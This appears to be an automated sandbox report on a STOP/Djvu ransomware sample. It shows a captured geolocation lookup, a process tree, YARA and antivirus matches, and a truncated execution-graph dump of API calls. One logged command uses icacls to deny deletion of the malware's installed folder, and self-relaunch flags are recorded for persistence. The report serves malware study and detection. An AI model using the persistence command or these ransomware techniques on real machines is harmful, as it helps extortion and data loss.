                                                                                                Server: cloudflare
                                                                                                CF-RAY: 84b4ae3f897b1363-ATL
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-01-26 00:36:16 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                2024-01-26 00:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:01:35:55
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Imagebase:0x470000
                                                                                                File size:1'150'976 bytes
                                                                                                MD5 hash:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:01:35:57
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                Imagebase:0x660000
                                                                                                File size:29'696 bytes
                                                                                                MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:01:35:57
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                Imagebase:0x470000
                                                                                                File size:1'150'976 bytes
                                                                                                MD5 hash:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:01:35:58
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe --Task
                                                                                                Imagebase:0xe20000
                                                                                                File size:1'150'976 bytes
                                                                                                MD5 hash:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: unknown
                                                                                                • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, Author: ditekSHen
                                                                                                Antivirus matches:
                                                                                                • Detection: 87%, ReversingLabs
                                                                                                • Detection: 76%, Virustotal, Browse
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:4
                                                                                                Start time:01:36:05
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                                                                                                Imagebase:0xe20000
                                                                                                File size:1'150'976 bytes
                                                                                                MD5 hash:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:01:36:13
                                                                                                Start date:26/01/2024
                                                                                                Path:C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --AutoStart
                                                                                                Imagebase:0xe20000
                                                                                                File size:1'150'976 bytes
                                                                                                MD5 hash:5CACD6F1B5CEC25F3F0B0B3C4D5807D3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.4%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:36.4%
                                                                                                  Total number of Nodes:832
                                                                                                  Total number of Limit Nodes:93
                                                                                                  execution_graph 38401 493f84 38402 493f90 _vwprintf_helper 38401->38402 38438 4a2603 GetStartupInfoW 38402->38438 38404 493f95 38440 4978d5 GetProcessHeap 38404->38440 38406 493fed 38407 493ff8 38406->38407 38770 49411a 58 API calls 3 library calls 38406->38770 38441 495141 38407->38441 38410 493ffe 38411 494009 __RTC_Initialize 38410->38411 38771 49411a 58 API calls 3 library calls 38410->38771 38462 498754 38411->38462 38414 494018 38415 494024 GetCommandLineW 38414->38415 38772 49411a 58 API calls 3 library calls 38414->38772 38481 4a235f GetEnvironmentStringsW 38415->38481 38418 494023 38418->38415 38421 49403e 38422 494049 38421->38422 38773 497c2e 58 API calls 3 library calls 38421->38773 38491 4a21a1 38422->38491 38426 49405a 38505 497c68 38426->38505 38429 494062 38430 49406d __wwincmdln 38429->38430 38775 497c2e 58 API calls 3 library calls 38429->38775 38511 489f90 38430->38511 38433 494081 38434 494090 38433->38434 38767 497f3d 38433->38767 38776 497c59 58 API calls _doexit 38434->38776 38437 494095 _vwprintf_helper 38439 4a2619 38438->38439 38439->38404 38440->38406 38777 497d6c 36 API calls 2 library calls 38441->38777 38443 495146 38778 498c48 InitializeCriticalSectionAndSpinCount __ioinit 38443->38778 38445 49514b 38446 49514f 38445->38446 38780 4a24f7 TlsAlloc 38445->38780 38779 4951b7 61 API calls 2 library calls 38446->38779 38449 495154 38449->38410 38450 495161 38450->38446 38451 49516c 38450->38451 38781 498c96 38451->38781 38454 4951ae 38789 4951b7 61 API calls 2 library calls 38454->38789 38457 49518d 38457->38454 38459 495193 38457->38459 38458 4951b3 38458->38410 38788 49508e 58 API calls 4 library calls 38459->38788 38461 49519b GetCurrentThreadId 38461->38410 38463 498760 _vwprintf_helper 38462->38463 38801 498af7 38463->38801 38465 498767 38466 498c96 __calloc_crt 58 API calls 38465->38466 38468 498778 38466->38468 38467 4987e3 GetStartupInfoW 38475 4987f8 38467->38475 38478 498927 38467->38478 38468->38467 38469 498783 _vwprintf_helper @_EH4_CallFilterFunc@8 38468->38469 38469->38414 38470 4989ef 38810 4989ff LeaveCriticalSection _doexit 38470->38810 38472 498c96 __calloc_crt 58 API calls 38472->38475 38473 498974 GetStdHandle 38473->38478 38474 498987 GetFileType 38474->38478 38475->38472 38476 498846 38475->38476 38475->38478 38477 49887a GetFileType 38476->38477 38476->38478 38808 4a263e InitializeCriticalSectionAndSpinCount 38476->38808 38477->38476 38478->38470 38478->38473 38478->38474 38809 4a263e InitializeCriticalSectionAndSpinCount 38478->38809 38482 4a2370 38481->38482 38483 494034 38481->38483 38813 498cde 38482->38813 38487 4a1f64 GetModuleFileNameW 38483->38487 38485 4a2396 ___check_float_string 38486 4a23ac FreeEnvironmentStringsW 38485->38486 38486->38483 38489 4a1f98 _wparse_cmdline 38487->38489 38488 4a1fd8 _wparse_cmdline 38488->38421 38489->38488 38490 498cde __malloc_crt 58 API calls 38489->38490 38490->38488 38492 4a21ba _LangCountryEnumProc@4 38491->38492 38493 49404f 38491->38493 38494 498c96 __calloc_crt 58 API calls 38492->38494 38493->38426 38774 497c2e 58 API calls 3 library calls 38493->38774 38495 4a21e3 _LangCountryEnumProc@4 38494->38495 38495->38493 38497 498c96 __calloc_crt 58 API calls 38495->38497 38498 4a223a 38495->38498 38499 4a225f 38495->38499 38502 4a2276 38495->38502 38851 49962f 58 API calls __Strftime_l 38495->38851 38497->38495 38852 490bed 58 API calls 2 library calls 38498->38852 38853 490bed 58 API calls 2 library calls 38499->38853 38854 4942fd 8 API calls 2 library calls 38502->38854 38504 4a2282 38506 497c74 __IsNonwritableInCurrentImage 38505->38506 38855 4aaeb5 38506->38855 38508 497c92 __initterm_e 38510 497cb1 __cinit __IsNonwritableInCurrentImage 38508->38510 38858 4919ac 67 API calls __cinit 38508->38858 38510->38429 38512 489fa0 __ftell_nolock 38511->38512 38859 47cf10 38512->38859 38514 489fb0 38515 489fc4 GetCurrentProcess GetLastError SetPriorityClass 38514->38515 38516 489fb4 38514->38516 38518 489fe4 GetLastError 38515->38518 38519 489fe6 38515->38519 39083 4824e0 109 API calls _memset 38516->39083 38518->38519 38873 48d3c0 38519->38873 38520 489fb9 38520->38433 38523 48b669 39164 4bf23e 59 API calls 2 library calls 38523->39164 38524 48a022 38876 48d340 38524->38876 38526 48b673 39165 4bf23e 59 API calls 2 library calls 38526->39165 38531 48a065 38881 483a90 38531->38881 38535 48a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38537 48a33d GlobalFree 38535->38537 38551 48a196 38535->38551 38536 48a100 38536->38535 38538 48a45c 38537->38538 38539 48a354 38537->38539 38937 482220 38538->38937 38541 482220 76 API calls 38539->38541 38542 48a359 38541->38542 38544 48a466 38542->38544 38952 47ef50 38542->38952 38543 48a1cc lstrcmpW lstrcmpW 38543->38551 38544->38433 38546 48a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38546->38551 38547 490235 60 API calls _LangCountryEnumProc@4 38547->38551 38548 48a48f 38550 48a4ef 38548->38550 38957 483ea0 38548->38957 38552 481cd0 92 API calls 38550->38552 38551->38537 38551->38543 38551->38546 38551->38547 38553 48a361 38551->38553 38554 48a563 38552->38554 38897 493c92 38553->38897 38588 48a5db 38554->38588 38978 484690 38554->38978 38557 48a395 OpenProcess 38558 48a3a9 WaitForSingleObject CloseHandle 38557->38558 38559 48a402 38557->38559 38558->38559 38562 48a3cb 38558->38562 38900 481cd0 38559->38900 38560 48a6f9 39085 481a10 8 API calls 38560->39085 38578 48a3e2 GlobalFree 38562->38578 38579 48a3d4 Sleep 38562->38579 39084 481ab0 PeekMessageW DispatchMessageW PeekMessageW 38562->39084 38563 48a6fe 38567 48a70f 38563->38567 38568 48a8b6 CreateMutexA 38563->38568 38564 48a5a9 38570 484690 59 API calls 38564->38570 38572 48a7dc 38567->38572 38583 47ef50 58 API calls 38567->38583 38573 48a8ca 38568->38573 38575 48a5d4 38570->38575 38571 48a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38576 48a451 38571->38576 38580 47ef50 58 API calls 38572->38580 38577 47ef50 58 API calls 38573->38577 38574 48a624 GetVersion 38574->38560 38581 48a632 lstrcpyW lstrcatW lstrcatW 38574->38581 39001 47d240 CoInitialize 38575->39001 38576->38433 38591 48a8da 38577->38591 38584 48a3f7 38578->38584 38579->38557 38585 48a7ec 38580->38585 38586 48a674 _memset 38581->38586 38593 48a72f 38583->38593 38584->38433 38587 48a7f1 lstrlenA 38585->38587 38590 48a6b4 ShellExecuteExW 38586->38590 38589 490c62 _malloc 58 API calls 38587->38589 38588->38560 38588->38563 38588->38568 38588->38574 38592 48a810 _memset 38589->38592 38590->38563 38612 48a6e3 38590->38612 38594 483ea0 59 API calls 38591->38594 38607 48a92f 38591->38607 38596 48a81e MultiByteToWideChar lstrcatW 38592->38596 38595 483ea0 59 API calls 38593->38595 38598 48a780 38593->38598 38594->38591 38595->38593 38596->38587 38597 48a847 lstrlenW 38596->38597 38599 48a8a0 CreateMutexA 38597->38599 38600 48a856 38597->38600 38601 48a79c CreateThread 38598->38601 38602 48a792 38598->38602 38599->38573 39087 47e760 95 API calls 38600->39087 38601->38572 38606 48a7d0 38601->38606 39451 48dbd0 95 API calls 4 library calls 38601->39451 39086 483ff0 59 API calls ___check_float_string 38602->39086 38605 48a860 CreateThread WaitForSingleObject 38605->38599 39452 48e690 185 API calls 8 library calls 38605->39452 38606->38572 39088 485c10 38607->39088 38609 48a98c 39103 482840 60 API calls 38609->39103 38611 48a997 39104 480fc0 93 API calls 4 library calls 38611->39104 38612->38433 38614 48a9ab 38615 48a9c2 lstrlenA 38614->38615 38615->38612 38616 48a9d8 38615->38616 38617 485c10 59 API calls 38616->38617 38618 48aa23 38617->38618 39105 482840 60 API calls 38618->39105 38620 48aa2e lstrcpyA 38622 48aa4b 38620->38622 38622->38622 38623 485c10 59 API calls 38622->38623 38624 48aa90 38623->38624 38625 47ef50 58 API calls 38624->38625 38626 48aaa0 38625->38626 38627 483ea0 59 API calls 38626->38627 38628 48aaf5 38626->38628 38627->38626 39106 483ff0 59 API calls ___check_float_string 38628->39106 38630 48ab1d 39107 482900 38630->39107 38632 47ef50 58 API calls 38634 48abc5 38632->38634 38633 48ab28 _memmove 38633->38632 38635 483ea0 59 API calls 38634->38635 38636 48ac1e 38634->38636 38635->38634 39112 483ff0 59 API calls ___check_float_string 38636->39112 38638 48ac46 38639 482900 60 API calls 38638->38639 38641 48ac51 _memmove 38639->38641 38640 47ef50 58 API calls 38642 48acee 38640->38642 38641->38640 38643 483ea0 59 API calls 38642->38643 38644 48ad43 38642->38644 38643->38642 39113 483ff0 59 API calls ___check_float_string 38644->39113 38646 48ad6b 38647 482900 60 API calls 38646->38647 38650 48ad76 _memmove 38647->38650 38648 485c10 59 API calls 38649 48ae2a 38648->38649 39114 483580 59 API calls 38649->39114 38650->38648 38652 48ae3c 38653 485c10 59 API calls 38652->38653 38654 48ae76 38653->38654 39115 483580 59 API calls 38654->39115 38656 48ae82 38657 485c10 59 API calls 38656->38657 38658 48aebc 38657->38658 39116 483580 59 API calls 38658->39116 38660 48aec8 38661 485c10 59 API calls 38660->38661 38662 48af02 38661->38662 39117 483580 59 API calls 38662->39117 38664 48af0e 38665 485c10 59 API calls 38664->38665 38666 48af48 38665->38666 39118 483580 59 API calls 38666->39118 38668 48af54 38669 485c10 59 API calls 38668->38669 38670 48af8e 38669->38670 39119 483580 59 API calls 38670->39119 38672 48af9a 38673 485c10 59 API calls 38672->38673 38674 48afd4 38673->38674 39120 483580 59 API calls 38674->39120 38676 48afe0 39121 483100 59 API calls 38676->39121 38678 48b001 39122 483580 59 API calls 38678->39122 38680 48b025 39123 483100 59 API calls 38680->39123 38682 48b03c 39124 483580 59 API calls 38682->39124 38684 48b059 39125 483100 59 API calls 38684->39125 38686 48b070 39126 483580 59 API calls 38686->39126 38688 48b07c 39127 483100 59 API calls 38688->39127 38690 48b093 39128 483580 59 API calls 38690->39128 38692 48b09f 39129 483100 59 API calls 38692->39129 38694 48b0b6 39130 483580 59 API calls 38694->39130 38696 48b0c2 39131 483100 59 API calls 38696->39131 38698 48b0d9 39132 483580 59 API calls 38698->39132 38700 48b0e5 39133 483100 59 API calls 38700->39133 38702 48b0fc 39134 483580 59 API calls 38702->39134 38704 48b108 38706 48b130 38704->38706 39135 48cdd0 59 API calls 38704->39135 38707 47ef50 58 API calls 38706->38707 38708 48b16e 38707->38708 38710 48b1a5 GetUserNameW 38708->38710 39136 482de0 59 API calls 38708->39136 38711 48b1c9 38710->38711 39137 482c40 38711->39137 38713 48b1d8 39144 482bf0 59 API calls 38713->39144 38715 48b1ea 39145 47ecb0 60 API calls 2 library calls 38715->39145 38717 48b2f5 39148 4836c0 59 API calls 38717->39148 38719 48b308 39149 47ca70 59 API calls 38719->39149 38721 48b311 39150 4830b0 59 API calls 38721->39150 38723 482c40 59 API calls 38738 48b1f3 38723->38738 38724 48b322 39151 47c740 102 API calls 4 library calls 38724->39151 38726 48b327 39152 4811c0 169 API calls 2 library calls 38726->39152 38727 482900 60 API calls 38727->38738 38730 48b33b 39153 48ba10 LoadCursorW RegisterClassExW 38730->39153 38732 48b343 39154 48ba80 CreateWindowExW ShowWindow UpdateWindow 38732->39154 38734 483100 59 API calls 38734->38738 38735 48b34b 38739 48b34f 38735->38739 39155 480a50 65 API calls 38735->39155 38738->38717 38738->38723 38738->38727 38738->38734 39146 483580 59 API calls 38738->39146 39147 47f1f0 59 API calls 38738->39147 38739->38612 38740 48b379 39156 483100 59 API calls 38740->39156 38742 48b3a5 39157 483580 59 API calls 38742->39157 38744 48b48b 39163 48fdc0 CreateThread 38744->39163 38746 48b49f GetMessageW 38747 48b4ed 38746->38747 38748 48b4bf 38746->38748 38749 48b55b 38747->38749 38750 48b502 PostThreadMessageW 38747->38750 38752 48b4c5 TranslateMessage DispatchMessageW GetMessageW 38748->38752 38754 48b5bb 38749->38754 38755 48b564 PostThreadMessageW 38749->38755 38753 48b510 PeekMessageW 38750->38753 38752->38747 38752->38752 38756 48b546 WaitForSingleObject 38753->38756 38757 48b526 DispatchMessageW PeekMessageW 38753->38757 38754->38739 38761 48b5d2 CloseHandle 38754->38761 38758 48b570 PeekMessageW 38755->38758 38756->38749 38756->38753 38757->38756 38757->38757 38759 48b5a6 WaitForSingleObject 38758->38759 38760 48b586 DispatchMessageW PeekMessageW 38758->38760 38759->38754 38759->38758 38760->38759 38760->38760 38761->38739 38766 48b3b3 38766->38744 39158 48c330 59 API calls 38766->39158 39159 48c240 59 API calls 38766->39159 39160 48b8b0 59 API calls 38766->39160 39161 483260 59 API calls 38766->39161 39162 48fa10 CreateThread 38766->39162 39453 497e0e 38767->39453 38769 497f4c 38769->38434 38770->38407 38771->38411 38772->38418 38776->38437 38777->38443 38778->38445 38779->38449 38780->38450 38782 498c9d 38781->38782 38784 495179 38782->38784 38786 498cbb 38782->38786 38790 4ab813 38782->38790 38784->38454 38787 4a2553 TlsSetValue 38784->38787 38786->38782 38786->38784 38798 4a29c9 Sleep 38786->38798 38787->38457 38788->38461 38789->38458 38791 4ab81e 38790->38791 38795 4ab839 38790->38795 38792 4ab82a 38791->38792 38791->38795 38799 495208 58 API calls __getptd_noexit 38792->38799 38794 4ab849 RtlAllocateHeap 38794->38795 38796 4ab82f 38794->38796 38795->38794 38795->38796 38800 49793d DecodePointer 38795->38800 38796->38782 38798->38786 38799->38796 38800->38795 38802 498b08 38801->38802 38803 498b1b EnterCriticalSection 38801->38803 38811 498b9f 58 API calls 10 library calls 38802->38811 38803->38465 38805 498b0e 38805->38803 38812 497c2e 58 API calls 3 library calls 38805->38812 38808->38476 38809->38478 38810->38469 38811->38805 38815 498cec 38813->38815 38816 498d1e 38815->38816 38817 498cff 38815->38817 38819 490c62 38815->38819 38816->38485 38817->38815 38817->38816 38836 4a29c9 Sleep 38817->38836 38820 490cdd 38819->38820 38831 490c6e 38819->38831 38845 49793d DecodePointer 38820->38845 38822 490ce3 38846 495208 58 API calls __getptd_noexit 38822->38846 38825 490ca1 RtlAllocateHeap 38825->38831 38835 490cd5 38825->38835 38827 490cc9 38843 495208 58 API calls __getptd_noexit 38827->38843 38831->38825 38831->38827 38832 490cc7 38831->38832 38833 490c79 38831->38833 38842 49793d DecodePointer 38831->38842 38844 495208 58 API calls __getptd_noexit 38832->38844 38833->38831 38837 497f51 58 API calls __NMSG_WRITE 38833->38837 38838 497fae 58 API calls 9 library calls 38833->38838 38839 497b0b 38833->38839 38835->38815 38836->38817 38837->38833 38838->38833 38847 497ad7 GetModuleHandleExW 38839->38847 38842->38831 38843->38832 38844->38835 38845->38822 38846->38835 38848 497af0 GetProcAddress 38847->38848 38849 497b07 ExitProcess 38847->38849 38848->38849 38850 497b02 38848->38850 38850->38849 38851->38495 38852->38493 38853->38493 38854->38504 38856 4aaeb8 EncodePointer 38855->38856 38856->38856 38857 4aaed2 38856->38857 38857->38508 38858->38510 38860 47cf32 _memset __ftell_nolock 38859->38860 38861 47cf4f InternetOpenW 38860->38861 38862 485c10 59 API calls 38861->38862 38863 47cf8a InternetOpenUrlW 38862->38863 38864 47cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 38863->38864 38866 47cfb2 38863->38866 39166 4856d0 38864->39166 38866->38514 38867 4856d0 59 API calls 38869 47d049 38867->38869 38868 47d000 38868->38867 38869->38866 39185 483010 59 API calls 38869->39185 38871 47d084 38871->38866 39186 483010 59 API calls 38871->39186 39191 48ccc0 38873->39191 39211 48cc50 38876->39211 38879 48a04d 38879->38526 38879->38531 38882 483ad0 GetModuleFileNameW PathRemoveFileSpecW 38881->38882 38883 483ab2 38881->38883 38891 488400 38882->38891 38884 483aba 38883->38884 38885 483b00 38883->38885 38887 493b4c 59 API calls 38884->38887 39219 4bf23e 59 API calls 2 library calls 38885->39219 38888 483ac7 38887->38888 